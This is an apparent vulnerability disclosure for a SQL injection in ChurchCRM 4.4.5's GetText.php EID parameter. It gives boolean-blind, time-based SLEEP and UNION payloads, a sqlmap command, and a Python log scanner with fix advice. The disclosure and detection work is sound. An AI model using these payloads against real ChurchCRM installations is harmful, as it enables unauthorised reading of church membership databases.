ChurchCRM 4.4.5 — SQL Injection at GetText.php

Vulnerability Explanation:

ChurchCRM 4.4.5 was found to contain a SQL injection vulnerability via the EID parameter of /churchcrm/GetText.php.

Affected Component:

http://ip_address:port/churchcrm/GetText.php?EID=2

Payload:

Parameter: EID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EID=2 AND 5131=5131
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Tested on:

1. ChurchCRM Version 4.4.5: https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

Steps to attack:

1. Log in with admin credentials.

2. Go to “Events” (shown in the picture) and click “List Church Events”.

3. Click on “Sermon Text”.

4. The browser requests /churchcrm/GetText.php?EID=2.

5. Refresh the page and intercept the request with Burp.

6. Save the raw request to a text file.

7. Run sqlmap against the saved request with the following command:

sqlmap -r GetText.req -p EID

8. sqlmap confirms a SQL injection vulnerability via the EID parameter.
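On the defensive side, every injection technique sqlmap reported above shows up in web server logs as a non-integer EID value on GetText.php. The script below is an added example, not code from the original post or from ChurchCRM; it parses constructed Apache-style access log lines (the log format and the sample values are assumptions) and labels each suspicious EID with the technique it resembles.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (common log format); not taken from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /churchcrm/GetText.php?EID=2 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /churchcrm/GetText.php?EID=2%20AND%205131%3D5131 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /churchcrm/GetText.php?EID=2%20AND%20(SELECT%208794%20FROM%20(SELECT(SLEEP(5)))vcYY) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:08 +0000] "GET /churchcrm/GetText.php?EID=-8266%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /churchcrm/index.php HTTP/1.1" 200 300
"""

# ip ident user [timestamp] "METHOD target PROTO" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

def classify_eid(value: str) -> Optional[str]:
    """Return None when EID is a plain integer (the only legitimate shape),
    otherwise a label for the injection technique the value resembles."""
    if re.fullmatch(r"-?\d+", value):
        return None
    v = value.lower()
    if "union" in v and "select" in v:
        return "union-based"
    if "sleep(" in v or "benchmark(" in v:
        return "time-based blind"
    if re.search(r"\b(and|or)\b", v):
        return "boolean-based blind"
    return "malformed"

def scan_log(text: str) -> list:
    """Yield one finding per GetText.php request whose EID is not an integer."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected log format
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/GetText.php"):
            continue
        # parse_qs percent-decodes values, so "%20AND%20" becomes " AND "
        for eid in parse_qs(parts.query, keep_blank_values=True).get("EID", []):
            label = classify_eid(eid)
            if label:
                findings.append({"ip": m["ip"], "ts": m["ts"], "eid": eid, "technique": label})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['technique']}: EID={f['eid']!r}")
```

The same check belongs in the application itself: casting EID to an integer (or binding it as a parameter in a prepared statement) before it reaches the query removes the injection rather than just logging it.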

GrimTheRipper